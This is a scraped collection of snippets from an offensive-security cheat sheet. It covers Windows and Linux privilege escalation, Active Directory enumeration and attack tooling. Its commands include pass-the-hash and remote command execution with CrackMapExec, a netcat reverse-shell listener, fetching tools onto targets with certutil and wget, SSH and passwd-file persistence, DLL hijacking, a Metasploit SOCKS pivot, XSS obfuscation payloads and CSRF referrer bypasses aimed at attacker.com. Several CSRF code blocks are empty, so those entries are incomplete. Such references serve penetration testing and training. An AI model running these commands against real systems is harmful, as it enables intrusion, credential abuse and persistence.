Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Token-Impersonation/SeManageVolumePrivilege.md
Downloads the 'EnableAllTokenPrivs.ps1' script using wget and then hosts it locally using Python's HTTP server. This is the first step in enabling elevated privileges.
```shell
wget https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1
python -m http.server 80
```
--------------------------------
### Enum4Linux List All Options
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Scanning-&-Enumeration/Tools/Linux/Enum4linux.md
Displays all available command-line options and flags for Enum4Linux. This is useful for understanding the full capabilities of the tool.
```bash
enum4linux -A [IP-ADDRESS]
```
```bash
enum4linux -u [USERNAME] -p [PASSWORD] -A [IP-ADDRESS]
```
--------------------------------
### Host and Transfer WinPEAS for Weak Registry Hunting
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Weak-Registry-Permissions/Registry-Enumeration.md
This section demonstrates hosting the WinPEAS executable on a Python HTTP server and then transferring it to a target machine using the certutil command. It also includes a systeminfo command to verify the target's architecture.
```bash
python3 -m http.server 8000
```
```powershell
systeminfo | findstr /B /C:"System Type"
```
```powershell
certutil -urlcache -f http://[IP-ADDRESS]:8000/winPEASx64.exe winPEASx64.exe
```
```powershell
.\winPEASx64.exe
```
--------------------------------
### Start NTFS Transaction (C++)
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Establishing-Persistence/Process-Doppelgänging.md
Initiates a new transaction on an NTFS volume, a prerequisite for transacted file operations. Requires administrative privileges.
```c
HANDLE hTransaction = CreateTransaction(NULL, 0, 0, 0, 0, 0, NULL);
```
--------------------------------
### Determine Exim Binary Version
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Privilege-Escalation/SUID-SGID-Executables/Exploiting-Vulnerable-SUID-Binaries.md
Fetches the specific version of the Exim binary installed on the system. Knowing the version is essential for searching public exploit databases.
```bash
/usr/sbin/exim-4.84-3 --version
```
--------------------------------
### Enumerate Drupal Installations with Droopescan
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Common-Applications/cms/Drupal.md
Droopescan is a security scanner that can identify Drupal installations and versions. This command initiates a scan targeting Drupal.
```bash
droopescan scan drupal -u http://[DRUPAL-DOMAIN]
```
--------------------------------
### List Installed Packages
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Privilege-Escalation/System-Enumeration.md
Lists all installed Debian packages and filters the output to show packages related to 'package_name' in a case-insensitive manner. This is specific to Debian-based systems.
```shell
dpkg -l | grep -i "package_name"
```
--------------------------------
### Check Autostart Entries
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md
Inspect registry keys that contain startup programs for all users and the current user. PowerShell provides a streamlined way to query these entries.
```cmd
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
```
```cmd
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
```
```powershell
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
```
--------------------------------
### Test SSH Access with Private Key
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/SSH-PERSISTENCE.md
Tests the SSH connection using the generated private key to confirm successful key-based authentication.
```bash
ssh -i ~/.ssh/persistence_key user@target_machine
```
--------------------------------
### Transfer LinPEAS Script to Target
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Port-Forwarding/Enumeration.md
Downloads the LinPEAS script from a specified IP address and port using 'wget'. This command is executed on the target machine.
```bash
wget http://[IP-ADDRESS]:8000/linpeas.sh
```
--------------------------------
### CrackMapExec Pass the Hash
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Scanning-&-Enumeration/Tools/Linux/CrackMapExec.md
Examples for performing 'Pass the Hash' attacks using CrackMapExec. Supports both local authentication and standard pass-the-hash with LM/NTLM hashes.
```bash
crackmapexec smb [IP-ADDRESS]/24 -u [USERNAME] -H '[LMHASH:NTHASH]' --local-auth
```
```bash
crackmapexec smb [IP-ADDRESS]/24 -u [USERNAME] -H '[NTHASH]'
```
--------------------------------
### Set up Netcat Listener
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Token-Impersonation/SeDebugPrivilege.md
Starts a Netcat listener on a specified port to capture incoming reverse shell connections. The '-cAr' flags are used for raw, ASCII, and recursive listening.
```bash
rlwrap -cAr nc -lnvp 9002
```
--------------------------------
### FreeRDP Connection Scenarios
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Network/ports/3389.md
Demonstrates various FreeRDP connection scenarios including audio redirection, dynamic resolution, clipboard redirection, certificate ignoring, and shared directory mounting.
```bash
xfreerdp /u:[USERNAME] /p:[PASSWORD] /v:[TARGET-IP] /sound:sys:alsa
```
```bash
xfreerdp /v:[TARGET-IP] /u:[USERNAME] /p:[PASSWORD] /dynamic-resolution
```
```bash
xfreerdp /v:[TARGET-IP] /u:[USERNAME] /p:[PASSWORD] +clipboard
```
```bash
xfreerdp /v:[TARGET-IP] /u:[USERNAME] /p:[PASSWORD] /cert:ignore
```
```bash
xfreerdp /v:[TARGET-IP] /u:[USERNAME] /p:[PASSWORD] /drive:path/to/directory,share_name
```
--------------------------------
### Generate Password Hash with OpenSSL
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/Add-Account.md
Generates a hashed password using OpenSSL's MD5 crypt algorithm. Requires a salt and the desired password as input. The output is a string suitable for use in the /etc/passwd file.
```bash
openssl passwd -1 -salt [SALT] [PASSWORD]
```
--------------------------------
### Installed Hotfixes (WMIC/PowerShell)
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md
Lists installed Windows hotfixes (patches). 'wmic qfe list' uses the Windows Management Instrumentation Command-line, and 'Get-HotFix' is the PowerShell alternative.
```cmd
wmic qfe list
```
```powershell
Get-HotFix
```
--------------------------------
### Enumerate Drupal Installations with Nmap
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Common-Applications/cms/Drupal.md
Nmap, a network scanner, can be used with the 'http-drupal-enum' script to enumerate Drupal installations. This script probes the web server for Drupal-specific indicators.
```bash
nmap -sV --script http-drupal-enum --script-args http-drupal-enum.basepath=/ http://[DRUPAL-DOMAIN]
```
--------------------------------
### Upload Files via SMB (With Credentials)
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/File-Transfer/Upload-Operations.md
Explains how to upload files using SMB with authentication. It covers configuring the SMB server with credentials and mapping the network drive accordingly.
```bash
sudo impacket-smbserver hackfast $(pwd) -smb2support -user hackfast -password hackfast
```
```bash
smbserver.py share . -smb2support -username hackfast -password hackfast
```
```bash
net use z: \[IP-ADDRESS]\hackfast /user:hackfast hackfast
```
```bash
copy file.txt z:\file.txt
```
--------------------------------
### Execute Target Application (Command Line)
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Establishing-Persistence/DLL-Hijacking.md
This command executes the target application. If the malicious DLL has been placed correctly, the application will load it, executing the code within the DLL.
```bash
start "" "C:\\Path\\To\\Target\\Application\\Application.exe"
```
--------------------------------
### Unicode and HTML Encoding Examples
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Exploit/Injections/Client-Side-Injections/XSS.md
Provides examples of obfuscating JavaScript payloads using Unicode escape sequences and HTML entities. These methods can bypass filters that look for plain text keywords.
```javascript
alert(1)
```
```javascript
\u0061lert(1)
```
```html
'-alert(1)-'
```
--------------------------------
### CrackMapExec Target Formatting
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Scanning-&-Enumeration/Tools/Linux/CrackMapExec.md
Examples of how to specify target IP addresses or ranges for CrackMapExec scans. Supports single IPs, IP ranges, CIDR notation, and targets from a file.
```bash
crackmapexec smb [IP-ADDRESS-1] [IP-ADDRESS-2]
```
```bash
crackmapexec smb [IP-ADDRESS]-28 [IP-ADDRESS]-67
```
```bash
crackmapexec smb [IP-ADDRESS]/24
```
```bash
crackmapexec smb targets.txt
```
--------------------------------
### Initialize LXD with 'lxd init'
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Privilege-Escalation/Service-Based/LXD.md
Initializes the LXD daemon, prompting the user for configuration details necessary to set up the container environment.
```bash
lxd init
```
--------------------------------
### Start HTTP Server with Python
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Privilege-Escalation/Service-Based/Cron-Jobs/Hunting-Cron-Jobs.md
Starts a simple HTTP server on the current directory using Python 3. This is commonly used to serve files, such as the LinPEAS script, to a target machine.
```python
python3 -m http.server 80
```
--------------------------------
### BloodHound: Data Collection with SharpHound
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Scanning-&-Enumeration/Credentialed-Enumeration/From-Windows.md
Illustrates the process of collecting Active Directory data using SharpHound for analysis in BloodHound, including data ingestion and analysis steps.
```bash
.\SharpHound.exe -c All --zipfilename "output.zip"
```
--------------------------------
### CrackMapExec Command Execution
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Scanning-&-Enumeration/Tools/Linux/CrackMapExec.md
Examples for executing commands remotely on target systems using CrackMapExec. Demonstrates execution via cmd.exe, PowerShell, and forcing specific execution methods like smbexec.
```bash
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' -x 'whoami'
```
```bash
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' -x 'net user Administrator /domain' --exec-method smbexec
```
```bash
crackmapexec smb [IP-ADDRESS] -u [USERNAME] -p '[PASSWORD]' -X 'whoami'
```
--------------------------------
### List Loaded DLLs for Processes (Cmd/PowerShell)
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md
Displays the Dynamic Link Libraries (DLLs) loaded by running processes. 'tasklist /m' uses the command prompt, while 'Get-Process | Select-Object Name, Modules' leverages PowerShell for a more structured output.
```cmd
tasklist /m
```
```powershell
Get-Process | Select-Object Name, Modules
```
--------------------------------
### Gather Service Details using PowerShell Get-WmiObject
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Insecure-Service-Permissions/Service-Enumeration.md
Retrieves comprehensive information about a specified service, including its name, display name, start mode, state, binary path, and start name.
```powershell
Get-WmiObject win32_service | ?{$_.Name -like 'daclsvc'} | select Name, DisplayName, StartMode, State, PathName, StartName
```
--------------------------------
### Download SharpUp Executable
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Insecure-Permissions-Executable/Service-Enumeration.md
Downloads the SharpUp.exe executable from GitHub using wget. SharpUp is used for identifying Windows service misconfigurations.
```shell
wget https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/master/SharpUp.exe
```
--------------------------------
### Start Metasploit SOCKS Proxy
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Port-Forwarding/Meterpreter-Tunneling-&-Port-Forwarding.md
Initiates a SOCKS proxy server using Metasploit's auxiliary module. This allows tunneling traffic through the Meterpreter session.
```msf
use auxiliary/server/socks_proxy
set SRVPORT 9050
set SRVHOST 0.0.0.0
set VERSION 4a
run
```
--------------------------------
### Regex Examples for Referrer Bypass
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Bypassing/Bypassing-CSRF-Protection.md
A collection of regular expression patterns used to illustrate various ways a referrer check can be bypassed. These examples highlight how subtle variations in URL structure can trick validation mechanisms.
```regex
https://attacker.com?target.com
https://attacker.com;target.com
https://attacker.com/target.com/../targetPATH
https://target.com.attacker.com
https://attackertarget.com
https://target.com@attacker.com
https://attacker.com#target.com
https://attacker.com\.target.com
https://attacker.com/.target.com
```
--------------------------------
### Download PowerUp Script
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Unquoted-Service-Paths/Service-Hunting.md
Downloads the PowerUp PowerShell script from GitHub using wget.
```bash
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
```
--------------------------------
### Get Detailed System Information (PowerShell)
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md
Retrieves comprehensive system information using a single PowerShell cmdlet. This provides details about the computer's hardware, OS version, and configuration.
```powershell
Get-ComputerInfo
```
--------------------------------
### Get User Information
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md
Retrieve current user, list all user accounts, show RDP session users, list administrators, and get detailed user account information. Includes both command-line and PowerShell methods.
```cmd
whoami
```
```cmd
net user
```
```cmd
query user
```
```cmd
net localgroup administrators
```
```powershell
Get-LocalUser
```
```powershell
Get-LocalGroupMember -Group "Administrators"
```
```powershell
Get-WmiObject -Class Win32_UserAccount
```
--------------------------------
### JSON GET Request for CSRF
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Exploit/Injections/Client-Side-Injections/CSRF.md
A JavaScript snippet using XMLHttpRequest to send a GET request. Modern browsers may block this due to CORS policies, but it demonstrates a potential CSRF vector.
```javascript
```
--------------------------------
### GET Request Triggered Automatically for CSRF
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Exploit/Injections/Client-Side-Injections/CSRF.md
An HTML image tag that automatically sends a GET request when the page loads, exploiting CSRF vulnerabilities without requiring direct user interaction.
```html
```
--------------------------------
### Simple GET Request to Trigger CSRF
Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Exploit/Injections/Client-Side-Injections/CSRF.md
A basic HTML link that, when clicked by a user, sends a GET request to a target endpoint. This can be used in CSRF attacks if the endpoint performs sensitive actions.
```html
Click here to view!
```